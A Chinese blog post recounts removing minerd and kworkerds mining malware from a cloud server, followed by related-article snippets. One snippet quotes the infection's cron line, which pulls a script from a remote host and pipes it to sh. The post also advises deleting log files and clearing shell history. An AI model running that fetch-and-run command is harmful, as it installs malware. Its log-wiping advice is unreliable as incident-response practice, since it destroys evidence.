记录阿里云服务器被minerd和kworkerds感染作祟,

最新推荐文章于 2021-08-15 20:09:24 发布
最新推荐文章于 2021-08-15 20:09:24 发布
阅读量7.6k 收藏 7
点赞数 1
分类专栏: 阿里云 文章标签: minerd 记录阿里云服务器被minerd和kworkerds感染作祟 CPU CPU爆满
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lang363/article/details/82354830
版权

2018-09-01周五 阿里云云盾通知 检测到服务器有异常文件下载,当时没太注意,执行下面操作解决问题(简单针对于minerd处理)

1、执行 top -i命令查看cpu 使用总过高,使用top -l 查看到是minerd作祟,

 

2、果断ps -ef | grep ‘minerd’ 查看pid,

3、使用kill -9  程序的pid 杀死掉,

4、到 cd  /tmp/下查看是否存有临时文件,如果有rm -rf 删除,没有就算了

5、crontab -l 查看是否有定时,有的话到cd /etc/crontab  查看是否有陌生的定时任务,如果有也是直接删除,

6、然后top 再查看,成功了,然后查阅了资料,说redis 漏洞,果断修改了ssh密码,修改redis的端口,修改了登录数据库密码,一切看起来就是这么简单

然而我把一切想的太过简单,周六周日开心出去泡妞,又收到阿里云同样的通知,无奈再深恨的bug也不能阻挡我缓解压力的事件,周一早上打开阿里云账号,我靠,发生了什么,

xx.xx.xxx.xx(ixxxxx...)出现了可疑安全事件:Linux异常文件下载 ,建议您立即登录云盾-态势感知控制台查看详情和处理。

于是登录服务器查看。我嘞靠,输入一条命令ls 反应比乌龟还慢,然后每条命令反应都在3秒才能出结果,靠,3秒男人,我可受不了,于是从花了一天时间才解决掉,废话够多了,看下面,

1、命令 top -i 查看,我去,满满的cpu

2、于是 top -b ,呀有毒,居然没有占用大的cup资源

3、于是又 使用crontab -l 查看,赤裸裸定时任务,这又是什么鬼,矿机不是解决了吗?这那来的任务,

 

4、cd /tmp/ 下,三个莫名其妙出现的文件,果断 rm -rf 文件名删除

 5、ls -al 看下,果然还有隐藏文件,通通删除

6、去cd /etc/crontab ,删除定时任务,然后top -i,得到如下,cup依然张立在哪里,懵逼

 

7、top -b 多了一个python,干啥的不知道,查看删除进程python

8、最后去查看日志,如下顺着这个日志一步一步走下去,

9、cd  /etc,下rm -rf ld.so.preload

10、cd /usr/local/lib下 rm -rf libjdk.so

11、再去cd /etc/crontab ,查看有没有定时任务,有删除,

12、去cd /tmp下,有也统统删除,

13、top -b 居然有3个资源kworkerrds占据cpu 33%,终于找到你,尼玛,还好没放弃,由于当时找到目标,太过激动没截图,因为已经下午5点了,花了大量时间找原因,看日志,查资料,

14、于是果断ps -ef | grep kworkerrds,赤裸裸就是你

15、kill -9 pid ,history -c清除记录(下面解释)

16,top ,终于下来了,心累呀

17、之前花了大量时间查看原因,原来是黑客通过在我日志里面留下了程序,我之前清除了minerd,然后又通过日志里面的程序进行了一个脚本任务,通过这个脚本获取操作记录,(为什么history -c清除记录),然后再次侵入我的服务器,现在是21:00,心累,

18、对了,还有如下操作,这才完美收官。cd /var/log

19、可疑的日志通通删除,

20、记得修改所有密码,记得history -c

 

-A-Lang-
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
服务器常见故障.doc
06-25
服务器常见故障——硬件篇(1) 由于X86服务器和台式机有着很多相似之处,从前期部署 中期维护 后期管理都有着异曲 同工之妙。用得多了,遇到的故障自然不少,以下故障不知大家是否遇到过…… AD: 说起X86平台的CPU,...
关于服务被挖矿程序minerd入侵解决方法
Hu_wen的专栏
07-14 5万+
今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu 在opt目录下发现有个异常文件,是个命令文件minerd 在确定跟项目不相关的情况下判断是个木马程序,果断kill掉进程,然后删除/opt下minerd文件 本想这样可以解决,谁想不到15秒时间,又自动启动起来,而且文件又自动创建,这个让我想起了crontab的定时器,果然运维同
minerd解决随记
Show something
09-28 333
万恶的minerd挖矿木马,手段很高明,彻底根治比较难,先写个定时脚本压制下。核心命令ps -ef|grep "./minerd"|awk '{print $2}'|xargs kill修改定时任务# Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # |
linux服务器中了挖矿病毒kworkers的修复经过
elvismelody的博客
08-15 4417
服务器出现访问异常,cpu爆红,网络请求连接超级慢。通过top命令查询,看到异常程序kworkers、dbus。百度下,是7月份新出现的病毒。 看了下原理,清理步骤如下: 一、删除程序目录 病毒启动脚本loader.sh通过系统漏洞,把病毒程序下载到tomcat目录下的bin目录的git文件夹里,把git文件夹删除。 二、删除cron任务 在/etc/crontab,把异常的cron任务删除掉 三、删除隐藏进程脚本 病毒启动挖矿进程时自动载入链接库实现进程隐藏,该链接库叫libc2.28.so
linux minerd 进程,linux中了minerd之后的完全清理过程(详解)
weixin_35930255的博客
04-29 247
一不小心装了一个Redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊某天发现cpu load高的出奇,发现一个minerd进程 占了大量cpu,google了一下,发现自己中招了下面就是清理过程第一步1.立即停止redis服务,修改端口权限,增加密码措施2.按照网上的资料 删除 crontab 里的两个内容sudo rm /var/spool/cron/...
一个感染型木马病毒分析(一)
Fly20141201. 的专栏
08-04 6418
一、 样本信息 样本名称:resvr.exe(病毒母体) 样本大小:70144 字节 病毒名称:Trojan.Win32.Crypmodadv.a 样本MD5:5E63F3294520B7C07EB4DA38A2BEA301 样本SHA1: B45BCE0FCE6A0C3BA88A1778FA66A576B7D50895 电脑中了该病毒的典型的特
孩子耳朵不灵光,小心鼻炎作祟
08-19
孩子耳朵不灵光,小心鼻炎作祟
在路上横行无阻 耀武扬威的心态作祟.docx
10-01
在路上横行无阻 耀武扬威的心态作祟.docx
a63822322的板卡电容爆浆到底是谁在作祟?的说明
08-27
本资源为本人自己从搜刮而来 如果使用或不能解决你的问题 请留言把问题说清楚! 有空上线我会帮你解决! 本人其他资源请前往以下地址http://a63822322.download.csdn.net/
有关jQuery中parent()和siblings()的小问题
01-19
今天发现一个小问题,现在也不知道到底是哪个梗在作祟,但是感觉是parent()和siblings()其中的一个。  我是想这样的根据输入的条件删选内容:  demo: <!DOCTYPE html> <html lang=en> <head> &...
Trojan专杀工具,用着真不错.
03-19
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
华为鲲鹏Kworker进程占用CPU100解决方案
死磕音视频
11-28 4913
前言 最近用华为鲲鹏跑了一段时间服务后,出现了系统负载40多居高不下的情况,一排查发现是kworker进程占用CPU很高,而且还杀不掉。 通过华为的监控发现是磁盘I/O很高,重启服务器后能短暂解决问题,但是过几天负载还是会很高,导致很多进程被系统杀死。 但是出现问题的就一台鲲鹏,其他的鲲鹏没有出现,通过比较发现内核版本不一样,执行uname -a输出如下 正常的鲲鹏 Linux kpv7-pbx-0001 4.18.0-80.7.2.el7.aarch64 #1 SMP Thu Sep 12 16:1
关于kworker
pointfish的专栏
08-05 4万+
1    请问什么所 kworker 进程  清理旧版本的软件缓存:  sudo apt-get autoclean 这个进程是干什么的?  我的机器刚装11.04 没次卡的时候 top一下就发现 kworker 这个进程占用CPU很大,基本上都能到75%左右 you may try to disable all power saving con
记录一次解决kworkerds挖矿木马之旅
u013096592的专栏
12-13 7243
最近服务器上执行命令特别卡,使用top -c命令查看资源使用情况。好家伙,CPU基本占满了。使用kill命令杀掉进程之后,没过多久又重新启动。 网上搜索kworkerds,发现是挖矿木马。翻阅很多博客,按照步骤来。crontab -l查看是否被人恶意添加了定时任务,但是并没有。后来在/var/spool/cron目录下发现了挖矿定时任务。/var/spool/cron/ 这个目录下存放的是每...
kworker是什么,又什么用
热门推荐
lyblyblyblin的博客
02-22 6万+
名字的意思 什么时候有的 这么看 系统中查看 显示的内容怎么看 有什么用 参考名字的意思Kernel Worker什么时候有的kworker是3.x内核引入的这么看系统中查看Linux下使用 ps -ef|grep kowrker显示的内容怎么看显示的格式kworker/%u:%d%su:是unbound的缩写,代表没有绑定特定的CPU,kworker /u2:0中的 2 是 work_pool 的
Linux服务器被挖矿程序sustse和kworkerds感染后续处理
xinxin_2011的博客
12-17 4877
在上一篇博文Linux系统发现占用CPU达100%的进程并处理 里面以为已经把挖矿程序sustse处理干净了,可是没过两天又收到阿里云短信提醒,说服务器有问题,难道还有后门吗?也多亏阿里云给出提示“出现了可疑安全事件:Linux共享库文件预加载配置文件可疑篡改”。网上查了查相关内容,原来这个后门是动态链接库预加载机制造成的。 动态链接库预加载机制是系统提供给用户运行自定义动态链接库的一种方式,在可...
Linux清除木马minerd
骆驼大笨笨
08-02 9880
minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e 将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 2.删除minerd文件[root@iZ28rvl9qn3Z ~]
通信原理期末考试试题及答案2份.doc
04-18
通信原理期末考试试题及答案2份.doc
Skeleton-Low Poly 低多边形骨架模型Unity插件美术资源包unitypackage
最新发布
04-18
Skeleton-Low Poly 低多边形骨架模型Unity插件美术资源包unitypackage 支持Unity版本2019.4.29或更高 直接的低多边形骨架。 特点: - 低多边形(9k tris,8.5) - 适用于 Unity 5 及更高 版本 - 完全装配 - 包括一个 fbx 格式的模型 - PBR 纹理 - 高清纹理
基于ssm+vue学生学籍管理系统源码数据库文档.zip
04-18
基于ssm+vue学生学籍管理系统源码数据库文档.zip

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值